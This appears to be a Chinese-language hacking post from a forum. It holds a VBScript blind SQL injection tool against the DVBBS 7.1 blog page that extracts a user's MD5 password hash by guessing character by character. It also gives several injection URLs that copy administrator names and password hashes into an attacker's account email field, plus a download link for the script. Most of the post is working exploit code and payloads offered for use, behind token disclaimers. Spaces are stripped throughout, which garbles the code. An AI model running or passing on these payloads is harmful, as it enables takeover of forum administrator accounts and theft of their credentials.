'============================================================================
'DVBBSV7.1Boke注入
漏洞利用工具
'使用说明:
'在命令提示符下:
'cscript.exeblog.vbs要攻击的网站的博客路径要破解的博客
用户密码'如:
'cscript.exeblog.vbswww.xxxx.com/bbs/boke.aspadmin
'byexecsl2006.5.4
'============================================================================
OnErrorResumeNext
DimoArgs
DimoBokeXML'XMLHTTP对象用来打开目标网址
DimTargetURL'目标网址
DimBlogName'博客
用户名
DimTempStr'存放已获取的部分MD5
密码DimCharHex'定义16进制字符
SetoArgs=WScript.arguments
IfoArgs.count<2ThenCallShowUsage()
SetoBokeXML=CreateObject("Microsoft.XMLHTTP")
'补充完整目标网址
TargetURL=oArgs(0)
IfLCase(Left(TargetURL,7))<>"http://"ThenTargetURL="http://"&TargetURL
Ifright(TargetURL,1)<>"?"ThenTargetURL=TargetURL&"?"
BlogName=oArgs(1)
TempStr=""
CharHex=Split("0,1,2,3,4,5,6,7,8,9,a,b,c,d,e,f",",")
Callmain(TargetURL,BlogName)
SetoBokeXML=Nothing
'----------------------------------------------sub-------------------------------------------------------
'============================================
'函数名称:main
'函数功能:主程序,注入获得Boke
用户密码'============================================
Submain(TargetURL,BlogName)
DimMainOffset,SubOffset,TempLen,OpenURL,GetPage
ForMainOffset=1To16
ForSubOffset=0To15
TempLen=0
OpenURL=TargetURL&BlogName&"'and'"&TempStr&CharHex(SubOffset)&"'=left(password,"&MainOffset&")and''='.index.html"
oBokeXML.open"Get",OpenURL,False,"",""
oBokeXML.send
GetPage=BytesToBstr(oBokeXML.ResponseBody)
'判断访问的页面是否存在
IfInStr(GetPage,"")=0AndInStr(GetPage,"您正在搜索的网页可能已经删除、更名或暂时不可用。")=0Then
'“博客
用户不存在或填写的资料有误”为错误标志,返回此标志说明猜解的MD5不正确
'如果得到0000000000000000的MD5值,请修改错误标志
IfInStr(GetPage,"博客
用户不存在或填写的资料有误")=0Then
TempStr=TempStr&CharHex(SubOffset)
WScript.Echo"已获取的MD5值为:"&CStr(TempStr)&"其他
密码正在读取中,请等待。。。"
Exitfor
Endif
Else
WScript.echovbcrlf&"您输入的网址无法访问,请确认后重新输入。"&vbcrlf
WScript.echovbcrlf&"本程序只用于学习交流,不能用于其非法用途。"&vbcrlf&"因使用本程序引起的一切后果和责任由使用者自负"
WScript.Quit
EndIf
next
Next
WScript.Echo"成功读取
密码的MD5值,为:"&TempStr&"请不要使用本程序进行破坏行为!"
Endsub
'============================================
'函数名称:BytesToBstr
'函数功能:将XMLHTTP对象中的内容转化为GB2312编码
'============================================
FunctionBytesToBstr(body)
dimobjstream
setobjstream=CreateObject("ADODB.Stream")
objstream.Type=1
objstream.Mode=3
objstream.Open
objstream.Writebody
objstream.Position=0
objstream.Type=2
objstream.Charset="GB2312"
BytesToBstr=objstream.ReadText
objstream.Close
setobjstream=nothing
EndFunction
'============================
'函数名称:ShowUsage
'函数功能:使用方法提示
'============================
SubShowUsage()
WScript.echo"DVBBSv7.1Boke利用程序"&vbcrlf&"ByExecsl06.4.23"
WScript.echo"Usage:"&vbcrlf&"CScript"&WScript.ScriptFullName&"TargetURLBlogName"
WScript.echo"Example:"&vbcrlf&"CScript"&WScript.ScriptFullName&"www.xxxx.com/bbs/boke.aspadmin"
WScript.echo""
WScript.Quit
EndSub
[Copytoclipboard]
您可以在这里下到该程序的vbs文件
http://www.sdibt.edu.cn/jgsz/jwc/admin/help/blog.vbs也可以在文章末尾下到
下面是DVBBSV7.1SP1Boke注入
漏洞SQL版获得管理员
密码的SQL语句,
当然大家可以直接把的管理员
密码改成自己的
密码,不过这样就太不厚道了
希望大家不要搞破坏!搞破坏RP大大地坏!
将
用户表Dv_User中admin
密码放到
用户execsl的Email中
http://www.xxxx.com/boke.asp?admin'update/**/Dv_User/**/set/**/UserEmail=(select[Password]from/**/Dv_admin/**/where[Username]='admin')/**/where[UserName]='execsl';--.index.html
将管理员表Dv_admin中第一个
用户的
用户名放到
用户execsl的Email中
http://www.xxxx.com/boke.asp?admin'update/**/Dv_User/**/set/**/UserEmail=(select/**/top/**/1/**/[Username]from/**/Dv_admin)/**/where[UserName]='execsl';--.index.html
将管理员表Dv_admin中第一个
用户的
密码放到
用户execsl的Email中
http://www.xxxx.com/boke.asp?admin'update/**/Dv_User/**/set/**/UserEmail=(select/**/top/**/1/**/[Password]from/**/Dv_admin)/**/where[UserName]='execsl';--.index.html
http://www.xxxx.com/boke.asp?admin'update/**/Dv_User/**/set/**/UserEmail=(select[UserPassword]from/**/Dv_admin/**/where[id]=1)/**/where[UserName]='execsl';--.index.html
当前位置:
